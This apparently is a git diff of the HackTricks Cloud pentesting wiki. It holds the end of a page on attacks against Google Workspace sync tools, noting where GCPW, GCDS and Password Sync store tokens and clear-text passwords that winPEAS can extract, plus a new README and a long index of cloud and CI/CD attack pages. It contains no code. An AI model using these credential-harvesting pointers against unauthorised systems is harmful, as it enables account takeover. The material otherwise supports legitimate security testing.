- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## GCPW - Google Credential Provider for Windows - -This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store **tokens** to access Google Workspace in some places in the PC: Disk, memory & the registry... it's even possible to obtain the **clear text password**. - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gcpw-google-credential-provider-for-windows.md" %} -[gcpw-google-credential-provider-for-windows.md](gcpw-google-credential-provider-for-windows.md) -{% endcontent-ref %} - -## GCSD - Google Cloud Directory Sync - -This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing). - -It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time. - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gcds-google-cloud-directory-sync.md" %} -[gcds-google-cloud-directory-sync.md](gcds-google-cloud-directory-sync.md) -{% endcontent-ref %} - -## GPS - Google Password Sync - -This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. 
Every-time a user changes his password in the AD, it's set to Google. - -It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running). - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even the passwords and encrypted credentials**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gps-google-password-sync.md" %} -[gps-google-password-sync.md](gps-google-password-sync.md) -{% endcontent-ref %} - -## Admin Directory Sync - -The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories). - -Find more information about this in: - -{% content-ref url="gws-admin-directory-sync.md" %} -[gws-admin-directory-sync.md](gws-admin-directory-sync.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/src/README.md b/src/README.md new file mode 100644 index 000000000..e8b2b0355 --- /dev/null +++ b/src/README.md @@ -0,0 +1,36 @@ +# HackTricks Cloud + +Reading time: {{ #reading_time }} + +{{#include ./banners/hacktricks-training.md}} + +
+
+_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
+
+> [!TIP]
+> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news.
+
+### **Pentesting CI/CD Methodology**
+
+**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:**
+
+[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
+
+### Pentesting Cloud Methodology
+
+**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:**
+
+[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
+
+### License & Disclaimer
+
+**Check them in:**
+
+[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
+
+### Github Stats
+
+![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg)
+
+{{#include ./banners/hacktricks-training.md}}
diff --git a/src/SUMMARY.md b/src/SUMMARY.md new file mode 100644
index 000000000..f3c2f74f8
--- /dev/null
+++ b/src/SUMMARY.md
@@ -0,0 +1,503 @@
+# SUMMARY.md
+
+# 👽 Welcome!
+
+- [HackTricks Cloud](README.md)
+- [About the Author$$external:https://book.hacktricks.xyz/welcome/about-the-author$$]()
+- [HackTricks Values & faq$$external:https://book.hacktricks.xyz/welcome/hacktricks-values-and-faq$$]()
+
+# 🏭 Pentesting CI/CD
+
+- [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
+- [Github Security](pentesting-ci-cd/github-security/README.md)
+ - [Abusing Github Actions](pentesting-ci-cd/github-security/abusing-github-actions/README.md)
+ - [Gh Actions - Artifact Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md)
+ - [GH Actions - Cache Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md)
+ - [Gh Actions - Context Script Injections](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md)
+ - [Accessible Deleted Data in Github](pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md)
+ - [Basic Github Information](pentesting-ci-cd/github-security/basic-github-information.md)
+- [Gitea Security](pentesting-ci-cd/gitea-security/README.md)
+ - [Basic Gitea Information](pentesting-ci-cd/gitea-security/basic-gitea-information.md)
+- [Concourse Security](pentesting-ci-cd/concourse-security/README.md)
+ - [Concourse Architecture](pentesting-ci-cd/concourse-security/concourse-architecture.md)
+ - [Concourse Lab Creation](pentesting-ci-cd/concourse-security/concourse-lab-creation.md)
+ - [Concourse Enumeration & Attacks](pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md)
+- [CircleCI Security](pentesting-ci-cd/circleci-security.md)
+- [TravisCI Security](pentesting-ci-cd/travisci-security/README.md)
+ - [Basic TravisCI Information](pentesting-ci-cd/travisci-security/basic-travisci-information.md)
+- [Jenkins Security](pentesting-ci-cd/jenkins-security/README.md)
+ - [Basic Jenkins 
Information](pentesting-ci-cd/jenkins-security/basic-jenkins-information.md) + - [Jenkins RCE with Groovy Script](pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md) + - [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md) + - [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md) + - [Jenkins Arbitrary File Read to RCE via "Remember Me"](pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md) + - [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md) +- [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md) + - [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md) + - [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md) +- [Terraform Security](pentesting-ci-cd/terraform-security.md) +- [Atlantis Security](pentesting-ci-cd/atlantis-security.md) +- [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md) + - [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md) + - [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md) +- [Okta Security](pentesting-ci-cd/okta-security/README.md) + - [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md) +- [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md) +- [Supabase Security](pentesting-ci-cd/supabase-security.md) +- [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md) +- [Vercel Security](pentesting-ci-cd/vercel-security.md) +- [TODO](pentesting-ci-cd/todo.md) + +# ⛈️ Pentesting Cloud + +- [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md) +- [Kubernetes 
Pentesting](pentesting-cloud/kubernetes-security/README.md) + - [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md) + - [Pentesting Kubernetes Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md) + - [Kubelet Authentication & Authorization](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md) + - [Exposing Services in Kubernetes](pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md) + - [Attacking Kubernetes from inside a Pod](pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md) + - [Kubernetes Enumeration](pentesting-cloud/kubernetes-security/kubernetes-enumeration.md) + - [Kubernetes Role-Based Access Control(RBAC)](pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md) + - [Abusing Roles/ClusterRoles in Kubernetes](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md) + - [Pod Escape Privileges](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) + - [Kubernetes Roles Abuse Lab](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md) + - [Kubernetes Namespace Escalation](pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md) + - [Kubernetes External Secret Operator](pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md) + - [Kubernetes Pivoting to Clouds](pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md) + - [Kubernetes Network Attacks](pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md) + - [Kubernetes Hardening](pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md) + - [Kubernetes SecurityContext(s)](pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md) + - [Kubernetes OPA 
Gatekeeper](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md) + - [Kubernetes OPA Gatekeeper bypass](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md) + - [Kubernetes Kyverno](pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md) + - [Kubernetes Kyverno bypass](pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md) + - [Kubernetes ValidatingWebhookConfiguration](pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md) +- [GCP Pentesting](pentesting-cloud/gcp-security/README.md) + - [GCP - Basic Information](pentesting-cloud/gcp-security/gcp-basic-information/README.md) + - [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md) + - [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md) + - [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md) + - [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md) + - [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md) + - [GCP - Cloud Build Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) + - [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) + - [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) + - [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) + - [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) + - [GCP - Compute Post 
Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) + - [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md) + - [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md) + - [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md) + - [GCP - Logging Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md) + - [GCP - Monitoring Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md) + - [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) + - [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) + - [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) + - [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) + - [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) + - [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) + - [GCP - Apikeys Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md) + - [GCP - AppEngine Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md) + - [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md) + - [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md) + - [GCP - BigQuery 
Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md) + - [GCP - ClientAuthConfig Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md) + - [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md) + - [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) + - [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) + - [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) + - [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) + - [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) + - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) + - [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) + - [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) + - [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) + - [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) + - [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md) + - [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md) + - [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md) + - [GCP - Run Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md) + - [GCP - Secretmanager 
Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md) + - [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md) + - [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md) + - [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md) + - [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md) + - [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md) + - [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md) + - [GCP - local privilege escalation ssh pivoting](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) + - [GCP - Persistence](pentesting-cloud/gcp-security/gcp-persistence/README.md) + - [GCP - API Keys Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md) + - [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md) + - [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md) + - [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md) + - [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md) + - [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md) + - [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md) + - [GCP - Cloud SQL Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md) + - [GCP - Compute 
Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md) + - [GCP - Dataflow Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md) + - [GCP - Filestore Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md) + - [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md) + - [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md) + - [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md) + - [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md) + - [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md) + - [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md) + - [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md) + - [GCP - App Engine Enum](pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md) + - [GCP - Artifact Registry Enum](pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md) + - [GCP - Batch Enum](pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md) + - [GCP - Bigquery Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md) + - [GCP - Bigtable Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md) + - [GCP - Cloud Build Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md) + - [GCP - Cloud Functions Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md) + - [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md) + - [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md) + - [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md) + - [GCP - Cloud Scheduler 
Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md) + - [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md) + - [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md) + - [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md) + - [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md) + - [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md) + - [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md) + - [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md) + - [GCP - Firebase Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md) + - [GCP - Firestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md) + - [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md) + - [GCP - KMS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md) + - [GCP - Logging Enum](pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md) + - [GCP - Memorystore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md) + - [GCP - Monitoring Enum](pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md) + - [GCP - Pub/Sub Enum](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md) + - [GCP - Secrets Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md) + - [GCP - Security Enum](pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md) + - [GCP - Source Repositories Enum](pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md) + - [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md) + - [GCP - Stackdriver 
Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md) + - [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md) + - [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md) + - [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md) + - [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md) + - [GCP - Unauthenticated Enum & Access](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md) + - [GCP - API Keys Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md) + - [GCP - App Engine Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md) + - [GCP - Artifact Registry Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md) + - [GCP - Cloud Build Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md) + - [GCP - Cloud Functions Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md) + - [GCP - Cloud Run Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md) + - [GCP - Cloud SQL Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md) + - [GCP - Compute Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) + - [GCP - IAM, Principals & Org Unauthenticated 
Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md) + - [GCP - Source Repositories Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md) + - [GCP - Storage Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md) + - [GCP - Public Buckets Privilege Escalation](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md) +- [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md) + - [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md) + - [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md) + - [GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md) + - [GWS - Admin Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md) + - [GCDS - Google Cloud Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md) + - [GCPW - Google Credential Provider for Windows](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md) + - [GPS - Google Password Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md) + - [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md) + - [GWS - App 
Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md) +- [AWS Pentesting](pentesting-cloud/aws-security/README.md) + - [AWS - Basic Information](pentesting-cloud/aws-security/aws-basic-information/README.md) + - [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md) + - [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md) + - [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md) + - [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md) + - [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md) + - [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md) + - [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md) + - [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md) + - [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md) + - [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md) + - [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md) + - [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md) + - [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md) + - [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md) + - [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) + - [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md) + - [AWS - Lightsail 
Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md)
+ - [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md)
+ - [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md)
+ - [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md)
+ - [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md)
+ - [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md)
+ - [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md)
+ - [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md)
+ - [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md)
+ - [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md)
+ - [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md)
